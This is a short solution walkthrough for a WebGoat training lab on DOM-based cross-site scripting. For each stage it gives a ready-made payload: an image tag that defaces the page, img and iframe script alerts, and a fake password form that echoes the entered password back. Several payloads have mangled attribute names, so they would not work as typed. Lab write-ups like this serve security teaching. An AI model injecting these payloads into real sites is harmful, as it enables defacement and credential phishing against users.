Ajax Security: LAB: DOM-Based cross-site scripting and Solution

Goal: 

Using  XSS vulnerability to inject malicious code into the DOM. 

Method: 

By code injection to input field. 

Step by step Guide

Stage 1  Deface this website 

Deface this website using the image at the following location: OWASP IMAGE(http://192.168.199.144:8080/WebGoat/images/logos/owasp.jpg)

Use  <IMG SRC="http://192.168.199.144:8080/WebGoat/images/logos/owasp.jpg"/>


Stage 2 Create a JavaScript alert using the image tag

Use below script 

<img src=x on-error=;;alert('XSS_Vulnerable') />


Stage 3 create a JavaScript alert using the IFRAME tag

Use below script

<IFRAME SRC="javascript:alert('XSS_Vulnerable');"></IFRAME>


Stage 4 Create a fake login form

1. To create fake login form by entering below script  to Field for Name entry. 

"Your assword:<BR><input type = "password" name="pass"/><button on-Click="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>"


2. Once enter it will show fake password entry form 

3. This concludes this lab. 

Please publish modules in offcanvas position.